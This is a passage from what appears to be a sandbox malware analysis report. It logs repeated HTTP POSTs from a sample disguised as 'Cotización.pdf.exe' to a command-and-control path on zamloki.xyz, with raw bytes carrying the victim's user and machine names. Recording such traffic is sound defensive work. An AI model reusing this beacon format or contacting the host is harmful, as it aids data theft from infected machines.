                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264c4fa384ebc-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      3192.168.2.349728172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:49.489130974 CEST1372OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:49.507272005 CEST1372OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:49.749449015 CEST1373INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:49 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=yIVilggOARaEz8XGQ0RJbbfbhU3Lucek9H0KjeFU3X1LuTWl4dDSlNagg6xm7kgRUOu6M3yvibFXL82TcM%2F7xlJC8SFCLoFLl%2F1gTARdZU%2Fe4srrsyPgtFM%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2645a6bfb4e2b-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      30192.168.2.349759172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:07.191426992 CEST1463OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:07.209393978 CEST1464OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:07.474390030 CEST1506INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:07 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=wUWrKyMOoRys3MqLpHPmVRq2ZyPo2hxlPBZvH2vOlekAoNlPMc95YWeZiaWZ%2FBAaR52%2BCjXLI6JEhNt9HyJYDCk3uDcnNsdfWvf4YQCObW5FgZXa7RDaM%2BA%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264c9089b4e2c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      31192.168.2.349760104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:07.738234043 CEST1507OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:07.756387949 CEST1507OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:08.040715933 CEST1508INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:08 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=3r63u7MbokcsfxAKYfWrZUiJM0yvnC5lV9o80umCqeMXjhbTEZoIEylheETB5t0QP%2FmBtpYO%2B2qzlXwNPRrHZ1gJAqh%2F%2Ft9QqT62Xbdxv7%2Bu9gFt5TLJAhg%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264cc6ad2d6e9-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      32192.168.2.349761172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:08.301656961 CEST1509OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:08.323138952 CEST1509OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:08.575089931 CEST1510INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:08 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2Bg4rIbacIMNg9A9ndAj73st6EPMo6m77ksguQhXSBvEHzqkJ9e6BC6QIA30O4hjA0%2FG%2BgZmegoU1SSWhUmuQfCkWYDUBIuWgubwUzfbIBG6XTjEhCRjW%2F%2FU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264cffa6e4eda-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      33192.168.2.349762104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:08.829385042 CEST1511OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:08.848097086 CEST1511OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:09.107927084 CEST1512INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:09 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=29a4Aw5LNa2YVAQpjgIZ4CzUVjrVCexk0VFGTCYRWFrClZKnKJLNaFzmE9tYiE73S4MKxQ1jmOWc5ptLszW4qd80HJhoYDpkU2I9%2FxmBQuEiTuDpu4UpAsM%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264d33dad176e-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      34192.168.2.349763172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:09.410996914 CEST1513OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:09.432569027 CEST1513OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:09.676810980 CEST1514INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:09 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lKCxfmh9hlPHWSVZ8V2O6yFS11Y7qasVGxFZvXDdRxnIV8%2Bg44frs8OIUijDXyGIV5fbr5nq1wmwC2mcmrFTIZWqnQZXOMLrCIro7oZOqHI0W5Z2As5HUY4%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264d6ee2f4ec2-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      35192.168.2.349764104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:09.931591034 CEST1515OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:09.949388981 CEST1515OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:10.195182085 CEST1516INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:10 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mA%2F%2BXDnh%2FaFiY0pCeWaVagefRKfeIwoKH5HGThD9McnkwpjXF83hb9GVorKbWr0DlhZo5PFv8IZg4cLuUj4qtmx8hRcInIFaijjpH%2FaF6ZkiwVNU2zjg%2FGc%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264da2f584ec8-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      36192.168.2.349765172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:10.478094101 CEST1516OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:10.497940063 CEST1517OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:10.763540030 CEST1517INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:10 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=guCEJSd3JAyhXzOoCiLXjnfKaEYLilzBnNGnbgVP%2F85lZQps36rbNq%2B6D3wE%2BlEvZ2rgLGNJ31EouepaZzmAPZB5WTVy2TnVX6N4BAvNYd0WgiM5SASEU28%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264dd8bf54e2c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      37192.168.2.349766172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:11.071847916 CEST1518OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:11.089468002 CEST1519OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:11.341855049 CEST1519INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:11 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=pGLEyjP6d5gXcCneFRZRx%2B1EOS7SXe78I9QhYpSsKmK2mUtvZ9ENx%2FQsDMGCYhrouhJf2xYj84AKARy7D7hYr78%2BwkUMQxhz6uPr%2BT8ATaHSXb%2FP97BsKeA%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264e14fae1772-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      38192.168.2.349767104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:11.598310947 CEST1520OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:11.620366096 CEST1520OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:11.887815952 CEST1521INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:11 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8E3%2F83OL6p%2B1TmX61VuF0a5V63IPxaKRyZBSGGq4r%2FfXQ3zpKa%2BFWVQmDCfDr35d4C4hMfHVAqhtbaiMLgbr5pN%2B%2BZdVeRB2YqAw4HYkj1cGHIK5i%2BfhcGs%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264e48dfa4a92-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      39192.168.2.349768104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:12.313741922 CEST1522OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:12.335361004 CEST1522OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:12.582452059 CEST1523INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=BVQVjuCI9EL6ChWKypowNmHLvHk9Bk7VkTH5HqzcLkLdc3S1F6Yk7qcLA3dsHjXMyAU%2BQMA9MLBIMND2ku1tiYeiQicckeHiZCKWqfXhJlJWh3zhl5wrT4c%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264e90c4505e9-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      4192.168.2.349729172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:50.130475044 CEST1374OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:50.148205042 CEST1374OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:50.392189980 CEST1375INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:50 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gbmRiisn1IeFLL3wR0izUcO07BhsQGPdtSkGKcYcNvMN1hkclhrs3vLKiwxk3Rd8AOIhIDWN%2BcIQrWW8hK0DBnNdEDpsyf9y5O9%2F7Fjmd%2FWJ4hdVyu1ExWE%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2645e5c1a4e49-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      40192.168.2.349769104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:12.868912935 CEST1524OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:12.890014887 CEST1524OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:13.147361994 CEST1544INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:13 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=dqjpqPRaPHoPqOv1sfNx6VxdnQDUQkuK%2Bt7f594SqKP9Jr8vEZSDxX4ynUymlhWwrPH1zoO5rmCrtgbtbPyq1TIskkWB20Df8Zat7V2OKE1LNVozs8Czx%2FY%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264ec8ed764eb-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      41192.168.2.349775172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:13.424881935 CEST5048OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:13.444992065 CEST5049OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:13.722137928 CEST5049INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:13 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
